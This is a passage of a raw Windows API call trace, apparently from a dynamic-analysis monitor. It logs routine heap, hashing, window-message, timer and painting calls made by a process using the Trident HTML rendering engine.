| out: hHeap=0x5e0000) returned 1 [0172.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0172.700] _CIsqrt () returned 0x407b027f [0172.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ac0 [0172.700] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.700] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.700] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ac0 | out: hHeap=0x5e0000) returned 1 [0172.700] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6ddef8 [0172.700] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.700] HashData (in: pbData=0xd95110, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0172.701] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddef8 | out: hHeap=0x5e0000) returned 1 [0172.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6b80 [0172.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fb0 [0172.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d78c8 [0172.701] HashData (in: pbData=0x9f82fb4, cbData=0x4, pbHash=0x9f82fb8, cbHash=0x2 | out: pbHash=0x9f82fb8) returned 0x0 [0172.701] HashData (in: pbData=0x6d78c8, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.701] HashData (in: pbData=0x6d78ca, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.701] HashData (in: pbData=0x6d78cc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.701] HashData (in: pbData=0x6d78d4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.701] HashData (in: pbData=0x6d78dc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.701] HashData (in: pbData=0x6d78e4, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.701] HashData (in: pbData=0x6d78e6, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.701] HashData (in: pbData=0x6d78e8, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.701] HashData (in: pbData=0x6d78f0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.701] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0172.702] HashData (in: pbData=0x6d78fc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.702] HashData (in: pbData=0x6d7904, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.702] HashData (in: pbData=0x6d7910, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.702] HashData (in: pbData=0x6d7914, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.702] HashData (in: pbData=0x6d791c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.702] HashData (in: pbData=0x6d7928, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.702] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d78c8 | out: hHeap=0x5e0000) returned 1 [0172.702] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fb0 | out: hHeap=0x5e0000) returned 1 [0172.702] HashData (in: pbData=0x9ee6b80, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.702] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.702] HashData (in: pbData=0x9ee6b84, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0172.702] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6b80 | out: hHeap=0x5e0000) returned 1 [0172.702] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.702] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.702] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.702] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.702] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.702] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ff8 [0172.703] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.703] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.703] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.703] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.703] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.703] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.703] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fc8 [0172.704] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.795] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.795] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.796] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.796] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.796] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831a8 [0172.798] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ff8 | out: hHeap=0x5e0000) returned 1 [0172.798] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fc8 | out: hHeap=0x5e0000) returned 1 [0172.799] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831a8 | out: hHeap=0x5e0000) returned 1 [0172.799] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68caf8 | out: hHeap=0x5e0000) returned 1 [0172.840] GetClientRect (in: hWnd=0x103e2, lpRect=0x199be4 | out: lpRect=0x199be4) returned 1 [0172.840] BitBlt (hdc=0x4010197, x=171, y=213, cx=42, cy=23, hdcSrc=0x8e01071c, x1=171, y1=213, rop=0xcc0020) returned 1 [0172.840] ReleaseDC (hWnd=0x103e2, hDC=0x4010197) returned 1 [0172.841] ReleaseDC (hWnd=0x103e2, hDC=0x51010a85) returned 1 [0172.841] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3099165998814) returned 1 [0172.841] DeleteObject (ho=0x27040a81) returned 1 [0172.842] GetCurrentThreadId () returned 0xb48 [0172.842] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0172.842] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3099166086663) returned 1 [0172.842] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3099166091951) returned 1 [0172.842] KillTimer (hWnd=0x30316, uIDEvent=0x201d) returned 1 [0172.842] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.842] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0172.842] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.842] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0172.843] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0172.843] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0172.843] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0172.843] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0172.843] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0172.843] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0172.843] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0172.843] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0172.843] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0172.843] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0172.843] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0172.843] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3099166227154) returned 1 [0172.843] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0172.844] NtdllDefWindowProc_W () returned 0x0 [0172.844] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.844] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0172.844] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.844] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2c0 | out: lpPerformanceCount=0x19a2c0*=3099166296462) returned 1 [0172.844] SetEvent (hEvent=0x304) returned 1 [0172.845] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.845] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0172.845] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.845] KillTimer (hWnd=0x30316, uIDEvent=0x2020) returned 1 [0172.845] QueryPerformanceCounter (in: lpPerformanceCount=0x19a26c | out: lpPerformanceCount=0x19a26c*=3099166428777) returned 1 [0172.845] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3099166433774) returned 1 [0172.845] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3099166442087) returned 1 [0172.845] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3099166446893) returned 1 [0172.846] SetEvent (hEvent=0x668) returned 1 [0172.846] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.846] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0172.846] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.846] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0172.846] KillTimer (hWnd=0x103e2, uIDEvent=0x1000) returned 1 [0172.847] GetCurrentThreadId () returned 0xb48 [0172.847] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.847] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0172.847] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.847] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.847] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0172.847] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.847] KillTimer (hWnd=0x30316, uIDEvent=0x201f) returned 1 [0172.847] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0176.547] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0176.547] NtdllDefWindowProc_W () returned 0x0 [0176.547] NtdllDefWindowProc_W () returned 0x0 [0176.547] NtdllDefWindowProc_W () returned 0x0 [0176.549] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0176.549] IsIconic (hWnd=0x103e0) returned 0 [0176.549] GetClientRect (in: hWnd=0x103e0, lpRect=0x19a374 | out: lpRect=0x19a374) returned 1 [0176.550] OffsetRect (in: lprc=0xd0c5ac, dx=0, dy=0 | out: lprc=0xd0c5ac) returned 1 [0176.550] CopyRect (in: lprcDst=0xd0c5bc, lprcSrc=0x19a374 | out: lprcDst=0xd0c5bc) returned 1 [0176.550] OffsetRect (in: lprc=0xd0c5bc, dx=0, dy=0 | out: lprc=0xd0c5bc) returned 1 [0176.550] CopyRect (in: lprcDst=0x19a254, lprcSrc=0x19a374 | out: lprcDst=0x19a254) returned 1 [0176.550] IntersectRect (in: lprcDst=0x19a264, lprcSrc1=0x19a254, lprcSrc2=0x19a374 | out: lprcDst=0x19a264) returned 1 [0176.550] EqualRect (lprc1=0x19a264, lprc2=0x19a254) returned 1 [0176.550] CreateRectRgnIndirect (lprect=0x6d72c540) returned 0x18040a78 [0176.550] GetUpdateRgn (hWnd=0x103e2, hRgn=0x18040a78, bErase=0) returned 1 [0176.550] DeleteObject (ho=0x18040a78) returned 1 [0176.550] SetWindowPos (hWnd=0x103e2, hWndInsertAfter=0x0, X=0, Y=0, cx=442, cy=256, uFlags=0x14) returned 1 [0176.550] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0176.550] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x46, wParam=0x0, lParam=0x19a1fc*=66530, plResult=0x19a058 | out: plResult=0x19a058) returned 0x1 [0176.550] NtdllDefWindowProc_W () returned 0x0 [0176.550] GetCurrentThreadId () returned 0xb48 [0176.551] GetCurrentThreadId () returned 0xb48 [0176.552] NtdllDefWindowProc_W () returned 0x0 [0176.553] NtdllDefWindowProc_W () returned 0x0 [0176.554] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0176.555] NtdllDefWindowProc_W () returned 0x0 [0176.555] NtdllDefWindowProc_W () returned 0x0 [0176.555] NtdllDefWindowProc_W () returned 0x0 [0176.555] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0176.555] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 6297072 [0176.556] NtdllDefWindowProc_W () returned 0x0 [0176.556] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0176.556] IUnknown_GetWindow (in: punk=0x0, phwnd=0x19a380 | out: phwnd=0x19a380) returned 0x80004005 [0176.556] NtdllDefWindowProc_W () returned 0x1 [0176.562] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0176.562] GetFocus () returned 0x0 [0176.563] SetFocus (hWnd=0x103e2) returned 0x0 [0176.563] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0176.563] GetMessageTime () returned 30889906 [0176.563] GetMessagePos () returned 0x11e01d6 [0176.563] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x199a74 | out: plResult=0x199a74) returned 0x0 [0176.564] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0176.564] GetMessageTime () returned 30889906 [0176.564] GetMessagePos () returned 0x11e01d6 [0176.564] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.564] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.564] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.569] memcpy_s (in: _Destination=0xd97e60, _DestinationSize=0x118, _Source=0xd97d40, _SourceSize=0x118 | out: _Destination=0xd97e60) returned 0x0 [0176.569] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcd60 [0176.569] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.569] SetTimer (hWnd=0x103e2, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0176.570] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0176.570] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0176.570] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0176.570] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0176.570] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0176.570] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0176.570] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0176.570] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0176.570] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0176.570] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0176.570] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0176.570] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0176.570] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0176.570] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0176.570] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcd60 | out: hHeap=0x5e0000) returned 1 [0176.571] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.571] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.571] malloc (_Size=0xb0) returned 0xc7f0f0 [0176.571] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcf20 [0176.571] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0176.572] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0176.573] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0176.573] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0176.573] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0176.573] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0176.573] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0176.573] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0176.573] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0176.573] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.573] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcf20 | out: hHeap=0x5e0000) returned 1 [0176.573] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x199334 | out: plResult=0x199334) returned 0x0 [0176.574] GetCurrentThreadId () returned 0xb48 [0176.574] GetCurrentThreadId () returned 0xb48 [0176.574] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0176.574] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0176.574] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x610430, hWnd=0x103e2, phIMC=0x199e44 | out: phIMC=0x199e44*=0x0) returned 0x0 [0176.575] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199b70 | out: lpPoint=0x199b70) returned 1 [0176.575] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199b70 | out: lpPoint=0x199b70) returned 1 [0176.575] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.575] GetCurrentThreadId () returned 0xb48 [0176.576] GetCurrentThreadId () returned 0xb48 [0176.576] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.576] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.576] GetCurrentThreadId () returned 0xb48 [0176.576] GetCurrentThreadId () returned 0xb48 [0176.576] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.576] GetCurrentThreadId () returned 0xb48 [0176.577] GetCurrentThreadId () returned 0xb48 [0176.577] GetCurrentThreadId () returned 0xb48 [0176.577] GetMessageTime () returned 30889906 [0176.577] GetMessagePos () returned 0x11e01d6 [0176.578] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x199da4 | out: plResult=0x199da4) returned 0x1 [0176.578] NtdllDefWindowProc_W () returned 0x0 [0176.578] GetCurrentThreadId () returned 0xb48 [0176.578] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0176.578] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0176.578] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a198 | out: lpPoint=0x19a198) returned 1 [0176.579] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.579] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a0 | out: lpPoint=0x19a1a0) returned 1 [0176.579] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.580] GetCurrentThreadId () returned 0xb48 [0176.580] GetCurrentThreadId () returned 0xb48 [0176.580] IsWinEventHookInstalled (event=0x8005) returned 0 [0176.580] GetCurrentThreadId () returned 0xb48 [0176.580] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a8 | out: lpPoint=0x19a1a8) returned 1 [0176.580] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.587] GetCurrentThreadId () returned 0xb48 [0176.587] GetCurrentThreadId () returned 0xb48 [0176.587] GetFocus () returned 0x103e2 [0176.587] GetCurrentThreadId () returned 0xb48 [0176.587] IsWinEventHookInstalled (event=0x8005) returned 0 [0176.587] GetCurrentThreadId () returned 0xb48 [0176.587] GetCurrentThreadId () returned 0xb48 [0176.588] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a198 | out: lpPoint=0x19a198) returned 1 [0176.588] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.588] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a0 | out: lpPoint=0x19a1a0) returned 1 [0176.588] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.589] GetCurrentThreadId () returned 0xb48 [0176.589] GetCurrentThreadId () returned 0xb48 [0176.589] IsWinEventHookInstalled (event=0x800a) returned 0 [0176.589] GetCurrentThreadId () returned 0xb48 [0176.589] LsSetDoc () returned 0x0 [0176.589] LsCreateLine () returned 0x0 [0176.590] LsDestroyLine () returned 0x0 [0176.590] GetFocus () returned 0x103e2 [0176.590] SystemParametersInfoW (in: uiAction=0x2006, uiParam=0x0, pvParam=0x19a268, fWinIni=0x0 | out: pvParam=0x19a268) returned 1 [0176.590] _CIsqrt () returned 0x3ff0027f [0176.591] _CIsqrt () returned 0x3ff0027f [0176.591] _CIatan2 () returned 0x20 [0176.591] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3099541020600) returned 1 [0176.591] GetCurrentThreadId () returned 0xb48 [0176.591] GetCurrentThreadId () returned 0xb48 [0176.591] GetCurrentThreadId () returned 0xb48 [0176.592] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1d8 | out: lpPerformanceCount=0x19a1d8*=3099541057936) returned 1 [0176.592] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1a8 | out: lpPerformanceCount=0x19a1a8*=3099541064378) returned 1 [0176.592] QueryPerformanceCounter (in: lpPerformanceCount=0x19a12c | out: lpPerformanceCount=0x19a12c*=3099541076464) returned 1 [0176.592] QueryPerformanceCounter (in: lpPerformanceCount=0x19a118 | out: lpPerformanceCount=0x19a118*=3099541082488) returned 1 [0176.592] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0bc | out: lpPerformanceCount=0x19a0bc*=3099541088332) returned 1 [0176.592] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0b4 | out: lpPerformanceCount=0x19a0b4*=3099541111418) returned 1 [0176.592] QueryPerformanceCounter (in: lpPerformanceCount=0x199fd4 | out: lpPerformanceCount=0x199fd4*=3099541120500) returned 1 [0176.592] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.592] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.593] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.593] SetEvent (hEvent=0x304) returned 1 [0176.593] WTSGetActiveConsoleSessionId () returned 0x1 [0176.593] GetCurrentProcessId () returned 0xe14 [0176.593] GetCurrentThreadId () returned 0xb48 [0176.593] SetEvent (hEvent=0x668) returned 1 [0176.593] GetClientRect (in: hWnd=0x103e2, lpRect=0x19a240 | out: lpRect=0x19a240) returned 1 [0176.594] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0176.594] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0176.595] GetAsyncKeyState (vKey=17) returned 0 [0176.595] GetAsyncKeyState (vKey=16) returned 0 [0176.595] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a0d0 | out: lpPoint=0x19a0d0) returned 1 [0176.595] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.595] memcpy_s (in: _Destination=0xd9a120, _DestinationSize=0x118, _Source=0x19a118, _SourceSize=0x118 | out: _Destination=0xd9a120) returned 0x0 [0176.595] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83190 [0176.596] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 